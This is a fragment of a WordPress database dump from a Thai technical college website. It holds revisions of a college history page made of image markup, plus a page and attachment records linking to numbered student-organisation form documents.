(2655, 3, '2018-05-22 15:51:36', '2018-05-22 08:51:36', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full alignleft\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full alignleft\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full alignleft\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n \r\n\r\n \r\n<h4></h4>\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"wp-image-1200 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"wp-image-1204 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"wp-image-1203 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"wp-image-1201 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a><a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"wp-image-1202 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:51:36', '2018-05-22 08:51:36', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2656, 3, '2018-05-22 15:51:41', '2018-05-22 08:51:41', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full alignleft\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full alignleft\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full alignleft\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n \r\n\r\n \r\n<h4></h4>\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"wp-image-1200 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"wp-image-1204 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"wp-image-1203 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"wp-image-1201 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a><a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"wp-image-1202 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:51:41', '2018-05-22 08:51:41', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2657, 3, '2018-05-22 15:52:34', '2018-05-22 08:52:34', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"wp-image-1200 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"wp-image-1204 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"wp-image-1203 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"wp-image-1201 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a><a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"wp-image-1202 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:52:34', '2018-05-22 08:52:34', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2658, 3, '2018-05-22 15:57:41', '2018-05-22 08:57:41', '', '4215345', '', 'inherit', 'closed', 'closed', '', '4215345', '', '', '2018-05-22 15:57:41', '2018-05-22 08:57:41', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/4215345.jpg', 0, 'attachment', 'image/jpeg', 0),
(2659, 3, '2018-05-22 15:58:52', '2018-05-22 08:58:52', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"wp-image-1200 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"wp-image-1204 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"wp-image-1203 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"wp-image-1201 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a><a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"wp-image-1202 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"size-full wp-image-2535 aligncenter\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"size-full wp-image-2537 aligncenter\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" /><img class=\"wp-image-2536 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/biodiversity-21597-1.jpg\" alt=\"\" width=\"800\" height=\"600\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"aligncenter size-full wp-image-2538\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" /><img class=\"aligncenter size-full wp-image-2539\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" /><img class=\"aligncenter wp-image-2542 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" /></h3>\r\n<img class=\"aligncenter wp-image-2543 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"aligncenter wp-image-2658 size-full\" src=\"/wp-content/uploads/2018/05/4215345.jpg\" alt=\"\" width=\"1024\" height=\"768\" /></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:58:52', '2018-05-22 08:58:52', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2661, 1, '2018-05-23 09:02:40', '2018-05-23 02:02:40', '<h1><a href=\"/wp-content/uploads/2018/05/อวท.01.1.docx\">อวท.01</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.02.2.docx\">อวท.02</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.3.docx\">อวท.02.1</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.2</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.26.docx\">อวท.26</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a></h1>', 'แบบ อวท. 1-36', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a-%e0%b8%ad%e0%b8%a7%e0%b8%97-1-36', '', '', '2018-05-28 10:36:14', '2018-05-28 03:36:14', '', 0, 'http://www.technicrayong.ac.th/?page_id=2661', 0, 'page', '', 0),
(2662, 1, '2018-05-23 08:39:08', '2018-05-23 01:39:08', '', 'อวท.01.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-01-1', '', '', '2018-05-23 08:39:08', '2018-05-23 01:39:08', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.01.1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2663, 1, '2018-05-23 08:39:09', '2018-05-23 01:39:09', '', 'อวท.02.2', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-02-2', '', '', '2018-05-23 08:39:09', '2018-05-23 01:39:09', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.02.2.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2664, 1, '2018-05-23 08:39:11', '2018-05-23 01:39:11', '', 'อวท.02.3', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-02-3', '', '', '2018-05-23 08:39:11', '2018-05-23 01:39:11', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.02.3.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2665, 1, '2018-05-23 08:39:13', '2018-05-23 01:39:13', '', 'อวท.02.4', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-02-4', '', '', '2018-05-23 08:39:13', '2018-05-23 01:39:13', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.02.4.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2666, 1, '2018-05-23 08:39:14', '2018-05-23 01:39:14', '', 'อวท.03docx', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-03docx', '', '', '2018-05-23 08:39:14', '2018-05-23 01:39:14', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.03docx.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2667, 1, '2018-05-23 08:39:16', '2018-05-23 01:39:16', '', 'อวท.04', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-04', '', '', '2018-05-23 08:39:16', '2018-05-23 01:39:16', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.04.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2668, 1, '2018-05-23 08:39:18', '2018-05-23 01:39:18', '', 'อวท.05.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-05-1', '', '', '2018-05-23 08:39:18', '2018-05-23 01:39:18', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.05.1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2669, 1, '2018-05-23 08:39:28', '2018-05-23 01:39:28', '', 'อวท.05', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-05', '', '', '2018-05-23 08:39:28', '2018-05-23 01:39:28', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.05.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2670, 1, '2018-05-23 08:39:29', '2018-05-23 01:39:29', '', 'อวท.06.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-06-1', '', '', '2018-05-23 08:39:29', '2018-05-23 01:39:29', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.06.1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2671, 1, '2018-05-23 08:39:31', '2018-05-23 01:39:31', '', 'อวท.06', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-06', '', '', '2018-05-23 08:39:31', '2018-05-23 01:39:31', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.06.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2672, 1, '2018-05-23 08:39:33', '2018-05-23 01:39:33', '', 'อวท.07.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-07-1', '', '', '2018-05-23 08:39:33', '2018-05-23 01:39:33', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.07.1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2673, 1, '2018-05-23 08:39:35', '2018-05-23 01:39:35', '', 'อวท.07', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-07', '', '', '2018-05-23 08:39:35', '2018-05-23 01:39:35', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.07.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2674, 1, '2018-05-23 08:39:37', '2018-05-23 01:39:37', '', 'อวท.08', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-08', '', '', '2018-05-23 08:39:37', '2018-05-23 01:39:37', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.08.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2675, 1, '2018-05-23 08:39:39', '2018-05-23 01:39:39', '', 'อวท.09', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-09', '', '', '2018-05-23 08:39:39', '2018-05-23 01:39:39', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.09.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2676, 1, '2018-05-23 08:39:41', '2018-05-23 01:39:41', '', 'อวท.10', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-10', '', '', '2018-05-23 08:39:41', '2018-05-23 01:39:41', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.10.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2677, 1, '2018-05-23 08:39:42', '2018-05-23 01:39:42', '', 'อวท.11.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-11-1', '', '', '2018-05-23 08:39:42', '2018-05-23 01:39:42', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.11.1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2678, 1, '2018-05-23 08:39:44', '2018-05-23 01:39:44', '', 'อวท.11', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-11', '', '', '2018-05-23 08:39:44', '2018-05-23 01:39:44', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.11.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2679, 1, '2018-05-23 08:39:46', '2018-05-23 01:39:46', '', 'อวท.12', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-12', '', '', '2018-05-23 08:39:46', '2018-05-23 01:39:46', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.12.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
